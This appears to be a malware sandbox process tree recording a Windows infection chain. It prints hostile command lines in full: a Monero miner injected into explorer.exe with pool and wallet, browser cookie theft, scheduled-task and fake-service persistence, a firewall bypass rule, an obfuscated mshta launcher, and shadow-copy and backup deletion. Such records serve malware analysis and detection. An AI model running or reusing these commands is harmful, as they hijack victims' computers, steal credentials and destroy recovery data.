                                                                                      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM --pass=30-60-miner --cpu-max-threads-hint=30 --cinit-idle-wait=5 --cinit-idle-cpu=60
                                                                                      8⤵
                                                                                        PID:5248
                                                                                  • C:\Users\Admin\Documents\N3FEB_X8n2w1GParZDu6tj7k.exe
                                                                                    "C:\Users\Admin\Documents\N3FEB_X8n2w1GParZDu6tj7k.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4568
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      7⤵
                                                                                        PID:5944
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        7⤵
                                                                                          PID:3516
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          7⤵
                                                                                            PID:5892
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            7⤵
                                                                                              PID:5064
                                                                                          • C:\Users\Admin\Documents\UN2uqxIo0DgUtVIko23I_g20.exe
                                                                                            "C:\Users\Admin\Documents\UN2uqxIo0DgUtVIko23I_g20.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Program Files directory
                                                                                            PID:4588
                                                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1508
                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                  PID:4504
                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                  8⤵
                                                                                                    PID:4264
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                    8⤵
                                                                                                      PID:196
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      8⤵
                                                                                                        PID:4432
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        8⤵
                                                                                                          PID:1724
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                          8⤵
                                                                                                            PID:2092
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            8⤵
                                                                                                              PID:3720
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                              8⤵
                                                                                                                PID:4808
                                                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:896
                                                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1524
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                8⤵
                                                                                                                  PID:5644
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  8⤵
                                                                                                                    PID:4864
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    8⤵
                                                                                                                      PID:3820
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      8⤵
                                                                                                                        PID:224
                                                                                                                  • C:\Users\Admin\Documents\6GOzkyw80odYfUrLwOdUEqFK.exe
                                                                                                                    "C:\Users\Admin\Documents\6GOzkyw80odYfUrLwOdUEqFK.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:4564
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                4⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:1364
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_6.exe
                                                                                                                  sonia_6.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Adds Run key to start application
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:3856
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    6⤵
                                                                                                                      PID:2784
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4384
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      6⤵
                                                                                                                        PID:5664
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        6⤵
                                                                                                                          PID:4144
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 528
                                                                                                                      4⤵
                                                                                                                      • Program crash
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:3448
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                      4⤵
                                                                                                                        PID:3260
                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                  1⤵
                                                                                                                    PID:2852
                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                    1⤵
                                                                                                                      PID:2740
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                      1⤵
                                                                                                                        PID:2724
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                        1⤵
                                                                                                                          PID:2432
                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Modifies registry class
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:3224
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                            2⤵
                                                                                                                            • Checks processor information in registry
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Modifies registry class
                                                                                                                            PID:2488
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks processor information in registry
                                                                                                                            • Modifies registry class
                                                                                                                            PID:2784
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                          1⤵
                                                                                                                            PID:2424
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                            1⤵
                                                                                                                              PID:1820
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                              1⤵
                                                                                                                                PID:1404
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                1⤵
                                                                                                                                  PID:1224
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                  1⤵
                                                                                                                                    PID:1184
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:1064
                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                      1⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      PID:676
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\ueisijd
                                                                                                                                        C:\Users\Admin\AppData\Roaming\ueisijd
                                                                                                                                        2⤵
                                                                                                                                          PID:5544
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\ueisijd
                                                                                                                                            C:\Users\Admin\AppData\Roaming\ueisijd
                                                                                                                                            3⤵
                                                                                                                                              PID:5252
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\ddisijd
                                                                                                                                            C:\Users\Admin\AppData\Roaming\ddisijd
                                                                                                                                            2⤵
                                                                                                                                              PID:5880
                                                                                                                                            • C:\ProgramData\Provisioning\settings.exe
                                                                                                                                              C:\ProgramData\Provisioning\settings.exe
                                                                                                                                              2⤵
                                                                                                                                                PID:4836
                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                  schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                                                                  3⤵
                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                  PID:6000
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\rfisijd
                                                                                                                                                C:\Users\Admin\AppData\Roaming\rfisijd
                                                                                                                                                2⤵
                                                                                                                                                  PID:4292
                                                                                                                                                • C:\ProgramData\Provisioning\settings.exe
                                                                                                                                                  C:\ProgramData\Provisioning\settings.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5680
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                                                                      3⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:4312
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\rfisijd
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\rfisijd
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5644
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\ddisijd
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\ddisijd
                                                                                                                                                      2⤵
                                                                                                                                                        PID:6092
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\ueisijd
                                                                                                                                                        C:\Users\Admin\AppData\Roaming\ueisijd
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3496
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\ueisijd
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\ueisijd
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4236
                                                                                                                                                          • C:\ProgramData\Provisioning\settings.exe
                                                                                                                                                            C:\ProgramData\Provisioning\settings.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3720
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                                                                                3⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:4712
                                                                                                                                                            • C:\ProgramData\Provisioning\settings.exe
                                                                                                                                                              C:\ProgramData\Provisioning\settings.exe
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5584
                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                  schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                  PID:6032
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\rfisijd
                                                                                                                                                                C:\Users\Admin\AppData\Roaming\rfisijd
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:1752
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\ueisijd
                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\ueisijd
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2072
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\ddisijd
                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\ddisijd
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4428
                                                                                                                                                                    • C:\ProgramData\Provisioning\settings.exe
                                                                                                                                                                      C:\ProgramData\Provisioning\settings.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:948
                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                          schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:4528
                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:68
                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:1548
                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2372
                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4952
                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                            PID:2808
                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5652
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BCBF.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\BCBF.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5988
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\BE76.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\BE76.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:4992
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D172.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\D172.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:1788
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DC02.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DC02.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:5216
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E0E5.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E0E5.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5384
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\EB85.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\EB85.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:4620
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F913.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\F913.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:932
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\FF9C.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\FF9C.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5396
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\FF9C.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\FF9C.exe" -agent 0
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:3848
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:5072
                                                                                                                                                                                                  • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                    vssadmin delete shadows /all /quiet
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                    PID:4668
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4364
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:3028
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:5100
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5056
                                                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                            wmic shadowcopy delete
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:3948
                                                                                                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                            notepad.exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:5864
                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:4808
                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5436
                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:6044
                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:4460
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:5224
                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:2252
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:5656
                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4548
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:4420
                                                                                                                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:4560
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\CF51.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\CF51.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4148
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ruugvahg\
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:5536
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cpgphuwq.exe" C:\Windows\SysWOW64\ruugvahg\
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:5096
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" create ruugvahg binPath= "C:\Windows\SysWOW64\ruugvahg\cpgphuwq.exe /d\"C:\Users\Admin\AppData\Local\Temp\CF51.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:5000
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\sc.exe" description ruugvahg "wifi internet conection"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:5936
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" start ruugvahg
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:5352
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:6060
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D462.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\D462.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:5844
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im D462.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D462.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:2300
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                      taskkill /im D462.exe /f
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                      PID:4996
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                      PID:3508
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DE56.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DE56.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:4204
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vBScRIpT: ClOSe ( creAteOBJect ( "WScrIpt.sHeLL" ). RUN ( "C:\Windows\system32\cmd.exe /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\DE56.exe"" SSD3pQMwaP.exe && STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr & if """" == """" for %y In (""C:\Users\Admin\AppData\Local\Temp\DE56.exe"" ) do taskkill -Im ""%~nxy"" /f " , 0 , tRUE ) )
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:5916
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\DE56.exe" SSD3pQMwaP.exe &&STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr& if "" == "" for %y In ("C:\Users\Admin\AppData\Local\Temp\DE56.exe" ) do taskkill -Im "%~nxy" /f
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:6052
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe
                                                                                                                                                                                                                                                              sSD3PQMWaP.exe -PmLQymN~qiAE1Rr
